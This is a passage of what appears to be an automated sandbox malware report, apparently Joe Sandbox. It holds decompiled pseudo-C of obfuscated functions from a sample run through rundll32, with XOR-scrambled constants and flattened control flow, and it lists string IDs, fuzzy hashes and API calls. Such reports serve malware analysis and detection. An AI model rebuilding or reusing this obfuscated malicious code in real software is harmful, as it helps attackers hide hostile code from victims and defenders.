                                                                                                                      				intOrPtr _t370;
                                                                                                                      				void* _t373;
                                                                                                                      				signed int _t379;
                                                                                                                      				signed int _t394;
                                                                                                                      				void* _t407;
                                                                                                                      				signed int _t422;
                                                                                                                      				signed int _t423;
                                                                                                                      				signed int _t424;
                                                                                                                      				signed int _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				void* _t434;
                                                                                                                      				void* _t435;
                                                                                                                      				void* _t436;
                                                                                                                      
                                                                                                                      				_t394 = __edx ^  *(__edi + 3);
                                                                                                                      				asm("int 0x55");
                                                                                                                      				_t435 = _t434 - 0x710;
                                                                                                                      				_t370 = _a8;
                                                                                                                      				_push(__edi);
                                                                                                                      				_push(_a20);
                                                                                                                      				if(__eflags == 0) {
                                                                                                                      					_push(_a16);
                                                                                                                      					_push(_a12);
                                                                                                                      					_push(_t370);
                                                                                                                      					_push(_a4);
                                                                                                                      					_push(_t394);
                                                                                                                      					_push(__ecx);
                                                                                                                      					E0034CF25(_t336);
                                                                                                                      					_v16 = 0x6f572e;
                                                                                                                      				}
                                                                                                                      				_t436 = _t435 + 0x1c;
                                                                                                                      				_v16 = _v16 >> 0xb;
                                                                                                                      				_v16 = _v16 + 0xd52f;
                                                                                                                      				_t373 = 0x80f983c;
                                                                                                                      				_v16 = _v16 ^ 0x3310f03a;
                                                                                                                      				_v16 = _v16 ^ 0x33101333;
                                                                                                                      				_v60 = 0xed71dd;
                                                                                                                      				_v60 = _v60 ^ 0x2497a453;
                                                                                                                      				_t422 = 0x26;
                                                                                                                      				_v60 = _v60 * 0x72;
                                                                                                                      				_v60 = _v60 ^ 0x3eb60fda;
                                                                                                                      				_v112 = 0xa5b0b2;
                                                                                                                      				_v112 = _v112 + 0x8954;
                                                                                                                      				_v112 = _v112 ^ 0x00ada628;
                                                                                                                      				_v108 = 0xe5587e;
                                                                                                                      				_v108 = _v108 << 9;
                                                                                                                      				_v108 = _v108 ^ 0xcab3bbf0;
                                                                                                                      				_v92 = 0x4845fb;
                                                                                                                      				_v92 = _v92 + 0x365f;
                                                                                                                      				_v92 = _v92 + 0xdd1a;
                                                                                                                      				_v92 = _v92 ^ 0x004e95c0;
                                                                                                                      				_v88 = 0xa51f24;
                                                                                                                      				_v88 = _v88 ^ 0x4dc3992d;
                                                                                                                      				_v88 = _v88 >> 9;
                                                                                                                      				_v88 = _v88 ^ 0x002183c7;
                                                                                                                      				_v28 = 0x92b1f2;
                                                                                                                      				_v28 = _v28 + 0xdb28;
                                                                                                                      				_v28 = _v28 ^ 0xc5c4fb2d;
                                                                                                                      				_v28 = _v28 + 0xffff07a3;
                                                                                                                      				_v28 = _v28 ^ 0xc5543e55;
                                                                                                                      				_v56 = 0x45fcf7;
                                                                                                                      				_v56 = _v56 ^ 0x18f8a820;
                                                                                                                      				_v56 = _v56 / _t422;
                                                                                                                      				_v56 = _v56 ^ 0x00a79737;
                                                                                                                      				_v72 = 0xd5567a;
                                                                                                                      				_v72 = _v72 ^ 0x96c46f64;
                                                                                                                      				_v72 = _v72 + 0x1123;
                                                                                                                      				_v72 = _v72 ^ 0x96131221;
                                                                                                                      				_v128 = 0xd7fcd2;
                                                                                                                      				_v128 = _v128 | 0x19fc7ba7;
                                                                                                                      				_v128 = _v128 ^ 0x19f2013f;
                                                                                                                      				_v36 = 0xb63dda;
                                                                                                                      				_v36 = _v36 | 0x57c3443c;
                                                                                                                      				_v36 = _v36 >> 0xf;
                                                                                                                      				_v36 = _v36 >> 2;
                                                                                                                      				_v36 = _v36 ^ 0x000375d9;
                                                                                                                      				_v120 = 0x9784e5;
                                                                                                                      				_v120 = _v120 ^ 0x5442b457;
                                                                                                                      				_v120 = _v120 ^ 0x54d2e3fe;
                                                                                                                      				_v152 = 0x86b47c;
                                                                                                                      				_v152 = _v152 | 0x1a648f0d;
                                                                                                                      				_v152 = _v152 ^ 0x1ae2f95e;
                                                                                                                      				_v104 = 0xe16033;
                                                                                                                      				_v104 = _v104 + 0xffff0503;
                                                                                                                      				_v104 = _v104 ^ 0x00e7872e;
                                                                                                                      				_v140 = 0x7ced29;
                                                                                                                      				_v140 = _v140 + 0x937a;
                                                                                                                      				_v140 = _v140 ^ 0x00718bd8;
                                                                                                                      				_v148 = 0xa848b7;
                                                                                                                      				_v148 = _v148 ^ 0xa8d47762;
                                                                                                                      				_v148 = _v148 ^ 0xa87b6210;
                                                                                                                      				_v124 = 0xc4055c;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 ^ 0x1882bddf;
                                                                                                                      				_v80 = 0x58e97;
                                                                                                                      				_t423 = 0x7c;
                                                                                                                      				_v80 = _v80 / _t423;
                                                                                                                      				_v80 = _v80 + 0xffff9366;
                                                                                                                      				_v80 = _v80 ^ 0xfffe01cd;
                                                                                                                      				_v48 = 0x77db93;
                                                                                                                      				_t424 = 0x3a;
                                                                                                                      				_v48 = _v48 / _t424;
                                                                                                                      				_v48 = _v48 + 0xffffa5b4;
                                                                                                                      				_v48 = _v48 >> 6;
                                                                                                                      				_v48 = _v48 ^ 0x00036e08;
                                                                                                                      				_v132 = 0x4854bc;
                                                                                                                      				_t425 = 0x4c;
                                                                                                                      				_v132 = _v132 * 0x24;
                                                                                                                      				_v132 = _v132 ^ 0x0a23127f;
                                                                                                                      				_v84 = 0x297997;
                                                                                                                      				_v84 = _v84 / _t425;
                                                                                                                      				_t426 = 0x45;
                                                                                                                      				_v84 = _v84 * 0x5e;
                                                                                                                      				_v84 = _v84 ^ 0x003e8360;
                                                                                                                      				_v24 = 0xba7a12;
                                                                                                                      				_v24 = _v24 << 9;
                                                                                                                      				_v24 = _v24 ^ 0x8e2fa782;
                                                                                                                      				_v24 = _v24 + 0xffffcaa3;
                                                                                                                      				_v24 = _v24 ^ 0xfad920cc;
                                                                                                                      				_v64 = 0xf87d94;
                                                                                                                      				_v64 = _v64 >> 3;
                                                                                                                      				_v64 = _v64 >> 4;
                                                                                                                      				_v64 = _v64 ^ 0x0002c2de;
                                                                                                                      				_v68 = 0x627eea;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 | 0x4b478a8f;
                                                                                                                      				_v68 = _v68 ^ 0x4b4b50ae;
                                                                                                                      				_v32 = 0x4d9af3;
                                                                                                                      				_v32 = _v32 + 0xffff3fdf;
                                                                                                                      				_v32 = _v32 | 0x07023235;
                                                                                                                      				_v32 = _v32 ^ 0xa9cb8ace;
                                                                                                                      				_v32 = _v32 ^ 0xae825d6e;
                                                                                                                      				_v144 = 0x2c231c;
                                                                                                                      				_v144 = _v144 ^ 0x372f588c;
                                                                                                                      				_v144 = _v144 ^ 0x37050cc1;
                                                                                                                      				_v40 = 0xed36d5;
                                                                                                                      				_v40 = _v40 / _t426;
                                                                                                                      				_v40 = _v40 + 0xffff2e56;
                                                                                                                      				_v40 = _v40 * 0xd;
                                                                                                                      				_v40 = _v40 ^ 0x002f5a10;
                                                                                                                      				_v20 = 0xb226b9;
                                                                                                                      				_v20 = _v20 << 5;
                                                                                                                      				_v20 = _v20 ^ 0x7ec33512;
                                                                                                                      				_v20 = _v20 ^ 0x86eef9df;
                                                                                                                      				_v20 = _v20 ^ 0xee6f0a5e;
                                                                                                                      				_v76 = 0xa2d2;
                                                                                                                      				_v76 = _v76 + 0xffff2403;
                                                                                                                      				_v76 = _v76 + 0xffff5c56;
                                                                                                                      				_v76 = _v76 ^ 0xfff84be5;
                                                                                                                      				_v12 = 0x61529e;
                                                                                                                      				_v12 = _v12 + 0x826f;
                                                                                                                      				_v12 = _v12 | 0x315ab852;
                                                                                                                      				_v12 = _v12 >> 0xa;
                                                                                                                      				_v12 = _v12 ^ 0x0008d08d;
                                                                                                                      				_v136 = 0xbe89c0;
                                                                                                                      				_v136 = _v136 ^ 0x9f3b785a;
                                                                                                                      				_v136 = _v136 ^ 0x9f8a2ffd;
                                                                                                                      				_v116 = 0x9615af;
                                                                                                                      				_v116 = _v116 | 0x7dcb4113;
                                                                                                                      				_v116 = _v116 ^ 0x7dd5a359;
                                                                                                                      				_v100 = 0x787e8d;
                                                                                                                      				_t427 = 0xf;
                                                                                                                      				_v100 = _v100 * 0x78;
                                                                                                                      				_v100 = _v100 ^ 0x3874d75c;
                                                                                                                      				_v96 = 0xce992e;
                                                                                                                      				_v96 = _v96 << 9;
                                                                                                                      				_v96 = _v96 | 0x5045bce0;
                                                                                                                      				_v96 = _v96 ^ 0xdd755c45;
                                                                                                                      				_v52 = 0xe3c541;
                                                                                                                      				_t419 = _v100;
                                                                                                                      				_v52 = _v52 / _t427;
                                                                                                                      				_v52 = _v52 + 0xffff4fb9;
                                                                                                                      				_v52 = _v52 | 0x0dbfd8b3;
                                                                                                                      				_v52 = _v52 ^ 0x0db5e533;
                                                                                                                      				_v44 = 0xd3f0eb;
                                                                                                                      				_v44 = _v44 | 0x02fbd4da;
                                                                                                                      				_v44 = _v44 >> 6;
                                                                                                                      				_v44 = _v44 + 0xffffa89e;
                                                                                                                      				_v44 = _v44 ^ 0x000772a1;
                                                                                                                      				while(1) {
                                                                                                                      					L6:
                                                                                                                      					_t407 = 0x2e;
                                                                                                                      					L7:
                                                                                                                      					while(_t373 != 0xcf103a) {
                                                                                                                      						if(_t373 == 0x80f983c) {
                                                                                                                      							_v156 = _t370;
                                                                                                                      							_t373 = 0xcf103a;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t373 == 0x8bdeaee) {
                                                                                                                      								__eflags = _v768 & _v16;
                                                                                                                      								if(__eflags == 0) {
                                                                                                                      									_t361 = _a16( &_v768,  &_v176);
                                                                                                                      									asm("sbb ecx, ecx");
                                                                                                                      									_t379 =  ~_t361 & 0x01058edd;
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _v724 - _t407;
                                                                                                                      									if(_v724 != _t407) {
                                                                                                                      										L23:
                                                                                                                      										__eflags = _a4;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_push(_v48);
                                                                                                                      											_push(_v80);
                                                                                                                      											_push(0x341264);
                                                                                                                      											E0034E7CE(E0034AB66(_v148, _v124, __eflags), __eflags, _v132, _t370, _v148, _v84, _v24, _v64, _v68,  &_v724);
                                                                                                                      											_push(_v40);
                                                                                                                      											_push(_a16);
                                                                                                                      											_t311 =  &_a12; // 0xee6f0a5e
                                                                                                                      											_push( *_t311);
                                                                                                                      											_push( &_v1808);
                                                                                                                      											_push(_a4);
                                                                                                                      											L1();
                                                                                                                      											_t436 = _t436 + 0x40;
                                                                                                                      											_t361 = E0034AE03(_v20, _v76, _v12, _t364);
                                                                                                                      											_t407 = 0x2e;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										__eflags = _v722;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											__eflags = _v722 - _t407;
                                                                                                                      											if(_v722 != _t407) {
                                                                                                                      												goto L23;
                                                                                                                      											} else {
                                                                                                                      												__eflags = _v720;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													goto L23;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									_t373 = 0xfa4bede;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								L32:
                                                                                                                      							} else {
                                                                                                                      								if(_t373 == 0x8fff290) {
                                                                                                                      									_t361 = E0035BAEA( &_v1288, _v152,  &_v768, _v104, _v140);
                                                                                                                      									_t419 = _t361;
                                                                                                                      									_t436 = _t436 + 0xc;
                                                                                                                      									__eflags = _t361 - 0xffffffff;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t373 = 0x8bdeaee;
                                                                                                                      										goto L6;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t373 == 0xe9f3001) {
                                                                                                                      										_t361 = E00358C35(_v100, _t419, _v96, _v52, _v44);
                                                                                                                      									} else {
                                                                                                                      										if(_t373 != 0xfa4bede) {
                                                                                                                      											L28:
                                                                                                                      											__eflags = _t373 - 0x71f77cc;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											_t278 =  &_v768; // 0x15f5595f
                                                                                                                      											_t361 = E0035F7FC(_v136, _t419, _v116, _t278);
                                                                                                                      											asm("sbb ecx, ecx");
                                                                                                                      											_t379 =  ~_t361 & 0xfa1ebaed;
                                                                                                                      											L14:
                                                                                                                      											_t373 = _t379 + 0xe9f3001;
                                                                                                                      											while(1) {
                                                                                                                      												L6:
                                                                                                                      												_t407 = 0x2e;
                                                                                                                      												goto L7;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return _t361;
                                                                                                                      						goto L32;
                                                                                                                      					}
                                                                                                                      					_push(_v92);
                                                                                                                      					_push(_v108);
                                                                                                                      					_push(0x3412d4);
                                                                                                                      					E00343BF8(_v28, __eflags, E0034AB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t370);
                                                                                                                      					E0034AE03(_v128, _v36, _v120, _t354);
                                                                                                                      					_t436 = _t436 + 0x28;
                                                                                                                      					_t373 = 0x8fff290;
                                                                                                                      					_t407 = 0x2e;
                                                                                                                      					goto L28;
                                                                                                                      				}
                                                                                                                      			}































































                                                                                                                      0x00341d98
                                                                                                                      0x00341d9e
                                                                                                                      0x00341e2d
                                                                                                                      0x00341e33
                                                                                                                      0x00341efd
                                                                                                                      0x00341f04
                                                                                                                      0x00341f06
                                                                                                                      0x00000000
                                                                                                                      0x00341e39
                                                                                                                      0x00341e39
                                                                                                                      0x00341e40
                                                                                                                      0x00341e69
                                                                                                                      0x00341e69
                                                                                                                      0x00341e6d
                                                                                                                      0x00341e6f
                                                                                                                      0x00341e72
                                                                                                                      0x00341e7e
                                                                                                                      0x00341ead
                                                                                                                      0x00341eb2
                                                                                                                      0x00341ec1
                                                                                                                      0x00341ec7
                                                                                                                      0x00341ec7
                                                                                                                      0x00341eca
                                                                                                                      0x00341ecb
                                                                                                                      0x00341ece
                                                                                                                      0x00341ed3
                                                                                                                      0x00341ee0
                                                                                                                      0x00341ee9
                                                                                                                      0x00341ee9
                                                                                                                      0x00341e42
                                                                                                                      0x00341e42
                                                                                                                      0x00341e4a
                                                                                                                      0x00341e4c
                                                                                                                      0x00341e53
                                                                                                                      0x00000000
                                                                                                                      0x00341e55
                                                                                                                      0x00341e55
                                                                                                                      0x00341e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00341e5d
                                                                                                                      0x00341e53
                                                                                                                      0x00341e4a
                                                                                                                      0x00341e5f
                                                                                                                      0x00000000
                                                                                                                      0x00341e5f
                                                                                                                      0x00000000
                                                                                                                      0x00341da4
                                                                                                                      0x00341daa
                                                                                                                      0x00341e0d
                                                                                                                      0x00341e12
                                                                                                                      0x00341e14
                                                                                                                      0x00341e17
                                                                                                                      0x00341e1a
                                                                                                                      0x00341e20
                                                                                                                      0x00000000
                                                                                                                      0x00341e20
                                                                                                                      0x00341dac
                                                                                                                      0x00341db2
                                                                                                                      0x00341f8c
                                                                                                                      0x00341db8
                                                                                                                      0x00341dbe
                                                                                                                      0x00341f70
                                                                                                                      0x00341f70
                                                                                                                      0x00341f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00341f7c
                                                                                                                      0x00341dc4
                                                                                                                      0x00341dc4
                                                                                                                      0x00341dd6
                                                                                                                      0x00341de1
                                                                                                                      0x00341de3
                                                                                                                      0x00341de9
                                                                                                                      0x00341de9
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7f
                                                                                                                      0x00000000
                                                                                                                      0x00341d7f
                                                                                                                      0x00341d7d
                                                                                                                      0x00341dbe
                                                                                                                      0x00341db2
                                                                                                                      0x00341daa
                                                                                                                      0x00341d9e
                                                                                                                      0x00341f9a
                                                                                                                      0x00000000
                                                                                                                      0x00341f9a
                                                                                                                      0x00341f21
                                                                                                                      0x00341f24
                                                                                                                      0x00341f2d
                                                                                                                      0x00341f51
                                                                                                                      0x00341f60
                                                                                                                      0x00341f65
                                                                                                                      0x00341f68
                                                                                                                      0x00341f6f
                                                                                                                      0x00000000
                                                                                                                      0x00341f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-1767839032
                                                                                                                      • Opcode ID: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction ID: acd88d3a237c3646ff80dfb56c5865fe0902bce998f322992c1928a0913254c4
                                                                                                                      • Opcode Fuzzy Hash: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction Fuzzy Hash: 5DC100B1C0131DDBDB69CFA5D98A5DEBFB1FB00318F208159D116BA264C7B84A8ACF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E003504B8() {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				void* _t191;
                                                                                                                      				signed int _t193;
                                                                                                                      				signed int _t194;
                                                                                                                      				void* _t198;
                                                                                                                      				void* _t219;
                                                                                                                      				intOrPtr _t224;
                                                                                                                      				signed int _t225;
                                                                                                                      				signed int _t226;
                                                                                                                      				signed int _t227;
                                                                                                                      				signed int _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				intOrPtr _t231;
                                                                                                                      				intOrPtr* _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int* _t234;
                                                                                                                      
                                                                                                                      				_t234 =  &_v88;
                                                                                                                      				_v12 = 0x2790ea;
                                                                                                                      				_v8 = 0xba5a5c;
                                                                                                                      				_t198 = 0x3d69ab1;
                                                                                                                      				_t224 = 0;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v60 = 0x2fd7ed;
                                                                                                                      				_v60 = _v60 | 0x771a9d11;
                                                                                                                      				_t225 = 0x45;
                                                                                                                      				_v60 = _v60 * 0x4e;
                                                                                                                      				_v60 = _v60 ^ 0x55773f16;
                                                                                                                      				_v40 = 0xe86db6;
                                                                                                                      				_v40 = _v40 | 0xabe4da9c;
                                                                                                                      				_v40 = _v40 ^ 0xabe3ff81;
                                                                                                                      				_v84 = 0x4e4c43;
                                                                                                                      				_v84 = _v84 + 0x2260;
                                                                                                                      				_v84 = _v84 / _t225;
                                                                                                                      				_t226 = 0x36;
                                                                                                                      				_v84 = _v84 / _t226;
                                                                                                                      				_v84 = _v84 ^ 0x000c99de;
                                                                                                                      				_v36 = 0x2c2e8d;
                                                                                                                      				_v36 = _v36 ^ 0x89bc573f;
                                                                                                                      				_v36 = _v36 ^ 0x899e3850;
                                                                                                                      				_v56 = 0xc456b8;
                                                                                                                      				_v56 = _v56 << 1;
                                                                                                                      				_t227 = 0x7a;
                                                                                                                      				_v56 = _v56 / _t227;
                                                                                                                      				_v56 = _v56 ^ 0x000dd00d;
                                                                                                                      				_v24 = 0x6eec6c;
                                                                                                                      				_v24 = _v24 * 0x67;
                                                                                                                      				_v24 = _v24 ^ 0x2ca24ccd;
                                                                                                                      				_v28 = 0xbd5c18;
                                                                                                                      				_v28 = _v28 + 0xd697;
                                                                                                                      				_v28 = _v28 ^ 0x00bf4353;
                                                                                                                      				_v32 = 0x8ab54f;
                                                                                                                      				_v32 = _v32 * 0x47;
                                                                                                                      				_v32 = _v32 ^ 0x267a3e13;
                                                                                                                      				_v88 = 0x583e0f;
                                                                                                                      				_v88 = _v88 >> 8;
                                                                                                                      				_v88 = _v88 + 0xffff5904;
                                                                                                                      				_v88 = _v88 << 0x10;
                                                                                                                      				_v88 = _v88 ^ 0xb14dc739;
                                                                                                                      				_v44 = 0x7902f;
                                                                                                                      				_v44 = _v44 + 0xffff35ef;
                                                                                                                      				_v44 = _v44 ^ 0x000a0038;
                                                                                                                      				_v64 = 0xab1413;
                                                                                                                      				_v64 = _v64 + 0xffff0fb9;
                                                                                                                      				_v64 = _v64 << 8;
                                                                                                                      				_v64 = _v64 ^ 0xaa2b0b8a;
                                                                                                                      				_v76 = 0x32b087;
                                                                                                                      				_v76 = _v76 | 0x42a79f0a;
                                                                                                                      				_v76 = _v76 ^ 0x7a54616b;
                                                                                                                      				_v76 = _v76 + 0x85;
                                                                                                                      				_v76 = _v76 ^ 0x38e777a2;
                                                                                                                      				_v20 = 0xba9969;
                                                                                                                      				_v20 = _v20 | 0x60b184e2;
                                                                                                                      				_v20 = _v20 ^ 0x60bd1ab4;
                                                                                                                      				_v52 = 0x531ceb;
                                                                                                                      				_v52 = _v52 ^ 0x8fc4675a;
                                                                                                                      				_v52 = _v52 >> 2;
                                                                                                                      				_v52 = _v52 ^ 0x23e32c7b;
                                                                                                                      				_v80 = 0xb054c0;
                                                                                                                      				_t228 = 0x5b;
                                                                                                                      				_v80 = _v80 / _t228;
                                                                                                                      				_v80 = _v80 << 1;
                                                                                                                      				_v80 = _v80 + 0xffffcecb;
                                                                                                                      				_v80 = _v80 ^ 0x0007d204;
                                                                                                                      				_v16 = 0x58f1c6;
                                                                                                                      				_v16 = _v16 ^ 0x8ee10e17;
                                                                                                                      				_v16 = _v16 ^ 0x8ebef1bd;
                                                                                                                      				_v68 = 0x312414;
                                                                                                                      				_t229 = 0x7b;
                                                                                                                      				_t233 = _v16;
                                                                                                                      				_v68 = _v68 / _t229;
                                                                                                                      				_v68 = _v68 + 0x1b34;
                                                                                                                      				_v68 = _v68 >> 2;
                                                                                                                      				_v68 = _v68 ^ 0x00095176;
                                                                                                                      				_t197 = _v16;
                                                                                                                      				_t230 = _v16;
                                                                                                                      				_v72 = 0xc0cd63;
                                                                                                                      				_v72 = _v72 | 0x9a162f11;
                                                                                                                      				_v72 = _v72 << 3;
                                                                                                                      				_v72 = _v72 * 0x12;
                                                                                                                      				_v72 = _v72 ^ 0x18eea785;
                                                                                                                      				_v48 = 0xaed007;
                                                                                                                      				_v48 = _v48 ^ 0x406d7cc3;
                                                                                                                      				_v48 = _v48 << 3;
                                                                                                                      				_v48 = _v48 ^ 0x061a7dff;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t219 = 0x5c;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						do {
                                                                                                                      							L3:
                                                                                                                      							while(_t198 != 0x2c774a6) {
                                                                                                                      								if(_t198 == 0x3d69ab1) {
                                                                                                                      									_t198 = 0x526c216;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t198 == 0x4efcef6) {
                                                                                                                      										E0035E689(_v76, _v20, _v52, _t233, _v80);
                                                                                                                      										_t234 =  &(_t234[3]);
                                                                                                                      										_t198 = 0x2c774a6;
                                                                                                                      										goto L1;
                                                                                                                      									} else {
                                                                                                                      										if(_t198 == 0x526c216) {
                                                                                                                      											_t231 =  *0x36520c; // 0x0
                                                                                                                      											_t232 = _t231 + 0x220;
                                                                                                                      											while( *_t232 != _t219) {
                                                                                                                      												_t232 = _t232 + 2;
                                                                                                                      											}
                                                                                                                      											_t230 = _t232 + 2;
                                                                                                                      											_t198 = 0xb318200;
                                                                                                                      											goto L2;
                                                                                                                      										} else {
                                                                                                                      											if(_t198 == 0x54b01d8) {
                                                                                                                      												_t193 = E00342E96(_v56, _v24, _v28, _v60, _v32, _t230, _t197);
                                                                                                                      												_t234 =  &(_t234[5]);
                                                                                                                      												_t233 = _t193;
                                                                                                                      												_t191 = 0xe4f0407;
                                                                                                                      												_t198 =  !=  ? 0xe4f0407 : 0x2c774a6;
                                                                                                                      												_t219 = 0x5c;
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												if(_t198 == 0xb318200) {
                                                                                                                      													_t194 = E0034EB36(_v84, _v36, _t198, _v40);
                                                                                                                      													_t197 = _t194;
                                                                                                                      													_t234 =  &(_t234[3]);
                                                                                                                      													if(_t194 != 0) {
                                                                                                                      														_t198 = 0x54b01d8;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															_t219 = 0x5c;
                                                                                                                      															goto L2;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													if(_t198 != _t191) {
                                                                                                                      														goto L21;
                                                                                                                      													} else {
                                                                                                                      														E0034C67D(_t233, _v88, _v44, _v64);
                                                                                                                      														_t224 =  !=  ? 1 : _t224;
                                                                                                                      														_t198 = 0x4efcef6;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															_t219 = 0x5c;
                                                                                                                      															L2:
                                                                                                                      															goto L3;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								goto L22;
                                                                                                                      							}
                                                                                                                      							E0035E689(_v16, _v68, _v72, _t197, _v48);
                                                                                                                      							_t234 =  &(_t234[3]);
                                                                                                                      							_t198 = 0xc9e12b8;
                                                                                                                      							_t191 = 0xe4f0407;
                                                                                                                      							_t219 = 0x5c;
                                                                                                                      							L21:
                                                                                                                      						} while (_t198 != 0xc9e12b8);
                                                                                                                      						L22:
                                                                                                                      						return _t224;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}









































                                                                                                                      0x003507aa
                                                                                                                      0x003507ad
                                                                                                                      0x00350740
                                                                                                                      0x00350740
                                                                                                                      0x00350742
                                                                                                                      0x00350743
                                                                                                                      0x00000000
                                                                                                                      0x00350743
                                                                                                                      0x00350740
                                                                                                                      0x0035078a
                                                                                                                      0x00350786
                                                                                                                      0x0035077e
                                                                                                                      0x00350772
                                                                                                                      0x00350766
                                                                                                                      0x00000000
                                                                                                                      0x0035075a
                                                                                                                      0x00350875
                                                                                                                      0x0035087a
                                                                                                                      0x0035087d
                                                                                                                      0x00350882
                                                                                                                      0x00350889
                                                                                                                      0x0035088a
                                                                                                                      0x0035088a
                                                                                                                      0x00350896
                                                                                                                      0x0035089f
                                                                                                                      0x0035089f
                                                                                                                      0x00350743

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$CLN$`"$kaTz$ln$vQ${,#
                                                                                                                      • API String ID: 0-3310206870
                                                                                                                      • Opcode ID: 2381f7a3e759c712d3479b8a14bac4268eb055a4d087d06067afc2ba332a1968
                                                                                                                      • Instruction ID: 8400f3d9d8929b547a49555b07245e72195421200e5f5d5d82509756a476fb26
                                                                                                                      • Opcode Fuzzy Hash: 2381f7a3e759c712d3479b8a14bac4268eb055a4d087d06067afc2ba332a1968
                                                                                                                      • Instruction Fuzzy Hash: 27A154715083419FC359CF65C88981BFFF1FBD4798F50891EF99A96260D3B28A498F82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                      • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                        • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
